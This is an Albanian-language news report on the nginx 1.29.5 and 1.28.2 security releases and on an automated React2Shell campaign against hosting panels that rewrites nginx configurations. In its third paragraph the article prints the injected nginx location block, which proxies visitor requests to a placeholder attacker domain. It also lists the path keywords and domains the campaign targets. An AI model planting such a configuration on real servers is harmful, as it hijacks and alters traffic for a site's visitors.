Është formuar lëshimi i degës kryesore të nginx 1.29.5, ku vazhdon zhvillimi i mundësive të reja, si dhe lëshimi i së njëjtës degë stabile 1.28.2, në të cilën bëhen vetëm ndryshime të lidhura me rregullimin e gabimeve të rënda dhe dobësive. Në azhurnime është eliminuar dobësia (CVE-2026-1642), e cila lejon një sulmues, i cili ka mundësi të përfshihet (MITM) në kanalin e komunikimit midis nginx dhe serverit upstream, të ndërlidhë përgjigjet e dërguara klientit. Problemi ndikon në konfigurimet që prokurojnë kërkesat (HTTP 1.x, HTTP/2, gRPC ose uWSGI) në serverin e lartë duke përdorur enkriptimin TLS.
Përveç dobësisë në lëshimin 1.29.5, është ulur niveli i logaritjes së gabimeve SSL 'ech_required' nga 'crit' në 'info', si dhe janë eliminuar disa probleme: është rregulluar përdorimi i memories së lëshuar (use-after-free) pas kalimit në backend-in tjetër gRPC ose HTTP/2; është zgjidhur problemi me dërgimin e një kërkese të pasaktë HTTP/2 pas kalimit në serverin upstream tjetër; është korrigjuar rritja e madhësisë së përgjigjes me disa diapazone; është rregulluar caktimi i variablës HTTP_HOST gjatë prokurimit në backend-et FastCGI, SCGI dhe uwsgi.
Një aspekt i rëndësishëm është identifikimi i një sulmi automatizuar, i cili pas një kompromitimi të suksesshëm serverëve kufizohet në ndryshimin e konfiguracionit të nginx. Sulmi ndodh përmes një vulnerabiliteti të pazgjidhur React2Shell në komponentët e serverit React në sistemet me panel të menaxhimit të hostimit, si Baota (BT). Ndryshimet e bëra në konfiguracionin e nginx drejtonin kërkesat për faqet e shërbysë në serverin e sulmuesve, i cili realizonte modifikime të dëmshme në përgjigjen që i kthehej përdoruesit. location /%PATH%/ { set $fullurl "$scheme://$host$request_uri"; rewrite ^/%PATH%/?(.*)$ /index.php?domain=$fullurl&$args break; proxy_set_header Host [Attacker_Domain]; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_set_header X-Forwarded-Proto $scheme; proxy_set_header User-Agent $http_user_agent; proxy_set_header Referer $http_referer; proxy_ssl_server_name on; proxy_pass http://[Attacker_Domain]; }
Kështu, në vend të instalimit të rootkit-eve ose malware në server, organizohet një sulm ndaj klientëve që hapin faqen e shërbimit në server, pa e modifikuar drejtpërdrejt komponentët e faqes në server. Sulmi kryesisht direcionohet për të kapur trafikun e dominave të vendeve aziatike, si dhe të dominave *.edu dhe *.gov. Përmes serverit të sulmuesve, drejtohen kërkesa selektive, për shembull, që përmbajnë në rrugët fjalët «pg», «pgslot», «slot», «game», «casino», «live», «help», «news», «page», «blog», «about», «support» dhe «info». Sulmi realizohet automatizuar duke përdorur mjete që kryejnë kërkimin dhe analizën e konfiguracionit të nginx, zgjedhjen dhe zëvendësimin e modelit të konfigurimit, riaktivizimin e nginx dhe kontrollin e funksionimit të variantit të ndryshuar.

Burimi: opennet.ru
